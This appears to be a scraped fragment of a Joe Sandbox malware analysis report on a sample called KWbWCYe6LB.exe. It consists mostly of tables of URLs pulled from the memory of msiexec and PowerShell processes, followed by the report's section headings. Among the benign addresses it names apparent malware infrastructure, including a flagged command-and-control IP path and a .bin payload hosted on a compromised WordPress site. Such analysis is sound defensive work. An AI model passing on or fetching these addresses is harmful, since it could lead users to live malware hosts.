http://79.110.49.155/cyb1/index.phpo	0%	Avira URL Cloud	safe
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binBo	0%	Avira URL Cloud	safe
http://79.110.49.155/cyb1/index.phpl	0%	Avira URL Cloud	safe
http://www.microsoft.U	0%	Avira URL Cloud	safe
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binZ	0%	Avira URL Cloud	safe
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binR	0%	Avira URL Cloud	safe
http://79.110.49.155/13Z0_1	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://79.110.49.155/cyb1/index.php	true	Avira URL Cloud: safe	unknown
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.bin	false	Avira URL Cloud: safe	unknown

Name	Source	Malicious	Antivirus Detection	Reputation
https://ganpatmasala.nl/1	msiexec.exe, 0000000C.00000002.1975516946.00000000073DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ganpatmasala.nl/q	msiexec.exe, 0000000C.00000002.1975516946.00000000073DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binO	msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.bin7oj	msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.	powershell.exe, 00000003.00000002.1790287990.0000000006C12000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1933242887.000000000740F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1933714611.000000000740F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	KWbWCYe6LB.exe, KWbWCYe6LB.exe.3.dr	false		high
http://79.110.49.155/cyb1/index.phpo	msiexec.exe, 0000000C.00000002.1975765988.000000000740F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	false		high
http://79.110.49.155/cyb1/index.phpl	msiexec.exe, 0000000C.00000002.1975765988.000000000740F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.U	powershell.exe, 00000003.00000002.1794178198.0000000007E5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binBo	msiexec.exe, 0000000C.00000002.1975516946.00000000073CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	KWbWCYe6LB.exe, KWbWCYe6LB.exe.3.dr	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.1786216899.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1786216899.0000000004807000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1788832751.000000000571E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binR	msiexec.exe, 0000000C.00000002.1975516946.000000000739A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1786216899.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ganpatmasala.nl/wp-admin/VQiRSepSQArj147.binZ	msiexec.exe, 0000000C.00000002.1975516946.000000000739A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://79.110.49.155/13Z0_1	msiexec.exe, 0000000

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KWbWCYe6LB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Windows Analysis Report
KWbWCYe6LB.exe